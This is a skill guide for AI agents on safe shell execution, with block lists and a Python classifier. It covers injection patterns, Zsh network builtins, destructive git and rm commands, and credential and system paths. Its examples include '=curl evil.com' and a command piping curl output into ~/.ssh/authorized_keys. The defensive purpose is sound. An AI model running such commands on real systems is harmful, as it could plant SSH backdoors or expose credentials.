Origin: This skill was extracted from Claude Code's internal implementation and rules. Claude Code openly exposes its safety mechanisms (hooks, system prompts, skill definitions) in the ~/.claude/ directory. The core safety patterns for shell execution — injection detection, destructive command classification, and sensitive path protection — were identified from Claude Code's production behavior and rewritten into a portable skill for OpenClaw agents.
# Safe Shell Execution

## Why This Matters

Shell execution is one of the highest-risk operations an AI agent can perform. Unlike reading files or calling APIs, improperly handled shell commands can cause irreversible damage: deleting files, leaking credentials, corrupting git history, or unauthorized network access.

This skill distills Claude Code's production-grade security patterns into three layers of checks (injection detection → destructive operation warnings → sensitive path protection), followed by a final classification step that decides how to run whatever passes.
## Layer 1: Injection Pattern Detection (Reject Directly)

Before executing any command, scan the full command string. If it matches any of the following patterns, reject execution and explain why to the user.

### Command Substitution (Injection Entry Points)
| Pattern | Risk |
|---|---|
| `$(...)` | Command substitution |
| `` `...` `` (unescaped backticks) | Legacy command substitution |
| `${...}` | Parameter expansion |
| `$[...]` | Legacy arithmetic expansion |
| `<(...)` or `>(...)` | Process substitution |
| `=(...)` | Zsh process substitution |
| `=cmd` (equals at word start) | **Zsh equals expansion**: `=curl evil.com` expands to `/usr/bin/curl evil.com`, bypassing command name checks |
| `$(.*<<` | Heredoc nested in command substitution, a common injection technique |
### Zsh-Specific Dangerous Commands

These commands have special attack surfaces in Zsh environments and always require explicit user confirmation:

- `zmodload`: loads modules that can enable invisible file I/O, pseudo-terminal execution, and TCP connections
- `zpty`: executes commands on a pseudo-terminal
- `ztcp` / `zsocket`: create network connections, usable for data exfiltration
- `sysopen` / `sysread` / `syswrite` / `sysseek`: low-level file descriptor operations
- `emulate -c`: eval equivalent, can execute arbitrary code
- `zf_rm` / `zf_mv` / `zf_ln` / `zf_chmod` / `zf_chown` / `zf_mkdir` / `zf_rmdir`: built-in file operations (provided by the zsh/files module) that run without invoking an external binary, so they bypass binary whitelists
---
## Layer 2: Destructive Operation Warnings (Confirm Before Execution)
These operations are legitimate but irreversible. **Display specific warnings and require user confirmation** before execution.
### Git Operations
```
git reset --hard            → may discard all uncommitted changes
git push --force / -f       → may overwrite remote history
git clean -f (without -n)   → may permanently delete untracked files
git checkout -- .           → may discard all working-tree changes
git restore .               → may discard all working-tree changes
git stash drop / clear      → may permanently delete stashed content
git branch -D               → may force-delete a branch
git commit --amend          → may rewrite the last commit
git commit/push --no-verify → may skip safety hooks
```
### File System
```
rm -rf / rm -fr / rm -r -f / rm -f -r → may recursively force-delete files
```
---
## Layer 3: Sensitive File Protection (Write Operations Require Confirmation)
For **write operations** to the following paths, you must obtain explicit user confirmation; auto-execution is not allowed:

```
# Shell configuration files (can be used for code execution)
.bashrc .bash_profile .bash_login .profile
.zshrc .zprofile .zshenv .zlogin
.tcshrc .cshrc

# Git configuration files (can be used for hook injection)
.gitconfig .gitmodules

# Package manager credentials
.npmrc .pypirc ~/.pip/pip.conf

# Credentials and keys
~/.ssh/ ~/.aws/ ~/.gnupg/ authorized_keys known_hosts

# System files
/etc/passwd /etc/hosts /etc/sudoers /etc/crontab
```
---
## Layer 4: Command Classification
After passing through the first three layers, classify and handle according to this table:
| Level | Examples | Handling |
|-------|----------|----------|
| **Safe** | `ls`, `cat`, `git status`, read-only operations | Execute directly, no prompts |
| **Caution** | Write to non-sensitive files, install packages | Execute, log the operation |
| **Warning** | Destructive patterns from Layer 2 | Display specific warning, require confirmation |
| **Reject** | Layer 1 injection patterns; writes to Layer 3 sensitive paths that the user has not explicitly confirmed | Refuse execution, explain why |
---
## Execution Flow
```
Receive command
  ↓
Layer 1: contains an injection pattern? → yes → reject + name the pattern + why it is dangerous
  ↓ no
Layer 2: matches a destructive pattern? → yes → display specific warning → wait for user confirmation
  ↓ no (or confirmed)
Layer 3: is it a write to a sensitive path? → yes → require explicit confirmation
  ↓ no (or confirmed)
Layer 4: classify → execute
```
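As an added example (not code from Claude Code or OpenClaw, and not the skill's own implementation), the following Python runs the flow above as a single `classify()` pass: the Layer 1 regexes reject, the Zsh builtins and Layer 3 sensitive-path writes ask for confirmation, Layer 2 patterns warn, and whatever remains is classified safe or caution. The regex spellings, the list of commands treated as writers (`tee`, `cp`, `mv`, `sed -i`, ...) and the read-only command list are assumptions chosen for this example; the page prescribes the patterns, not this code.

```python
# Added example: one classify() pass implementing the four layers above. Not code
# from Claude Code or OpenClaw. Assumption: the command may run under zsh.
import os
import re
import shlex

# Layer 1: injection entry points, scanned on the raw string. This is deliberately
# conservative: '$(x)' inside single quotes would not expand but is still rejected.
INJECTION = [
    (r"\$\(.*<<", "heredoc nested in command substitution"),
    (r"\$\(", "command substitution $(...)"),
    (r"`", "backtick command substitution"),
    (r"\$\{", "parameter expansion ${...}"),
    (r"\$\[", "legacy arithmetic expansion $[...]"),
    (r"[<>]\(", "process substitution <(...) / >(...)"),
    (r"(?:^|\s)=\(", "zsh process substitution =(...)"),
    (r"(?:^|\s)(=[A-Za-z_]\S*)", "zsh equals expansion: =cmd resolves to the binary's full path"),
]
ZSH_CONFIRM = set("zmodload zpty ztcp zsocket sysopen sysread syswrite sysseek emulate "
                  "zf_rm zf_mv zf_ln zf_chmod zf_chown zf_mkdir zf_rmdir".split())

# Layer 2: legitimate but irreversible git operations; rm and git clean are flag-based below.
DESTRUCTIVE = [
    (r"\bgit\s+reset\s+--hard\b", "git reset --hard discards all uncommitted changes"),
    (r"\bgit\s+push\b.*\s(--force|-f)\b", "git push --force overwrites remote history"),
    (r"\bgit\s+checkout\s+--\s+\.(\s|$)", "git checkout -- . discards working-tree changes"),
    (r"\bgit\s+restore\s+\.(\s|$)", "git restore . discards working-tree changes"),
    (r"\bgit\s+stash\s+(drop|clear)\b", "git stash drop/clear deletes stashed work"),
    (r"\bgit\s+branch\s+-D\b", "git branch -D force-deletes a branch"),
    (r"\bgit\s+commit\b.*--amend\b", "git commit --amend rewrites the last commit"),
    (r"\bgit\s+(commit|push)\b.*--no-verify\b", "--no-verify skips safety hooks"),
]

# Layer 3: writes to these paths need explicit confirmation (list from the page).
SENSITIVE_NAMES = set(".bashrc .bash_profile .bash_login .profile .zshrc .zprofile .zshenv "
                      ".zlogin .tcshrc .cshrc .gitconfig .gitmodules .npmrc .pypirc "
                      "authorized_keys known_hosts".split())
SENSITIVE_PREFIXES = ("~/.ssh/", "~/.aws/", "~/.gnupg/", "~/.pip/pip.conf",
                      "/etc/passwd", "/etc/hosts", "/etc/sudoers", "/etc/crontab")
WRITE_CMDS = set("tee cp mv rm chmod chown ln truncate install".split())  # assumed writers
SAFE_CMDS = set("ls cat pwd head tail grep wc which echo".split())        # assumed read-only
SAFE_GIT = set("status log diff show".split())


def _segments(cmd):
    """Tokenize (quotes respected) and split into simple commands at | || && ;"""
    lex = shlex.shlex(cmd, posix=True, punctuation_chars=True)
    lex.whitespace_split = True
    segs, cur = [], []
    for tok in lex:
        if tok in ("|", "||", "&&", ";"):
            segs, cur = segs + [cur], []
        else:
            cur.append(tok)
    return [s for s in segs + [cur] if s]


def _short_flags(seg):  # letters of all single-dash options, e.g. rm -r -f -> 'rf'
    return "".join(t[1:] for t in seg[1:] if t.startswith("-") and not t.startswith("--"))


def _destructive(cmd, segs):
    for pat, why in DESTRUCTIVE:
        if re.search(pat, cmd):
            return why
    for seg in segs:
        flags = _short_flags(seg)
        if seg[0] == "rm" and "r" in flags and "f" in flags:
            return "rm -rf deletes recursively without prompting"
        if seg[:2] == ["git", "clean"] and "f" in flags and "n" not in flags:
            return "git clean -f without -n permanently deletes untracked files"
    return None


def _write_targets(seg):  # redirect targets plus file arguments of writing commands
    out = [seg[i + 1] for i, t in enumerate(seg[:-1]) if t in (">", ">>")]
    if seg[0] in WRITE_CMDS or (seg[0] == "sed" and "i" in _short_flags(seg)):
        out += [t for t in seg[1:] if not t.startswith("-")]
    return out


def _is_sensitive(path):
    home = os.path.expanduser("~") + "/"            # fold $HOME/ and the absolute home into ~/
    path = re.sub(r"^(\$HOME/|" + re.escape(home) + ")", "~/", path)
    return os.path.basename(path) in SENSITIVE_NAMES or path.startswith(SENSITIVE_PREFIXES)


def classify(cmd):
    """Return (level, reason); level is reject | confirm | warning | caution | safe."""
    for pat, why in INJECTION:                       # Layer 1: reject and name the pattern
        if m := re.search(pat, cmd):
            return "reject", f"contains {m.group(m.lastindex or 0).strip()!r}: {why}"
    try:
        segs = _segments(cmd)
    except ValueError as e:                          # unbalanced quotes: do not guess
        return "reject", f"cannot parse safely: {e}"
    if zsh := [s[0] for s in segs if s[0] in ZSH_CONFIRM]:
        return "confirm", f"zsh builtin {zsh[0]} has a special attack surface"
    if why := _destructive(cmd, segs):               # Layer 2: warn, wait for confirmation
        return "warning", why
    if hits := [p for s in segs for p in _write_targets(s) if _is_sensitive(p)]:
        return "confirm", f"writes to sensitive path {hits[0]}"   # Layer 3
    read_only = all(not _write_targets(s) and (s[1] in SAFE_GIT if s[0] == "git" and len(s) > 1
                    else s[0] in SAFE_CMDS) for s in segs)
    return ("safe", "read-only, execute directly") if read_only else \
           ("caution", "writes or installs, execute and log")     # Layer 4
```

A call such as `classify("curl http://x | tee ~/.ssh/authorized_keys")` returns `("confirm", "writes to sensitive path ~/.ssh/authorized_keys")`, which is exactly the detail the refusal or confirmation message should carry. Two caveats a practitioner should keep in mind: scanning the raw string means a `$(` inside single quotes is rejected even though it would not expand, which is the safe direction for an agent; and because Layer 3 is scoped to writes, `cat ~/.ssh/id_rsa` classifies as safe under this model, so read access to credential files has to be covered by a separate policy if that matters in your environment.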
---
## How to Express Refusals
When refusing execution, be specific about **which pattern** and **why it's dangerous**, not a vague "command is unsafe".
Good rejection example:

> I cannot execute this command because it contains `=curl` (Zsh equals expansion). This pattern expands the command to the full path of the binary, which can bypass command-name whitelist checks. If you need to run curl, please write `curl` directly.

Bad rejection example:

> This command looks risky and I can't execute it.
## When to Apply This Skill

Apply this skill in the following situations:

- Command comes from user input (chat messages, form content, file content)
- Command contains variable interpolation from external data
- Will run in a shared or production environment
- Target path contains sensitive files (home directory, config files, credentials)
Even for commands you construct yourself (no external input), these checks are good practice, especially Layers 2 and 3.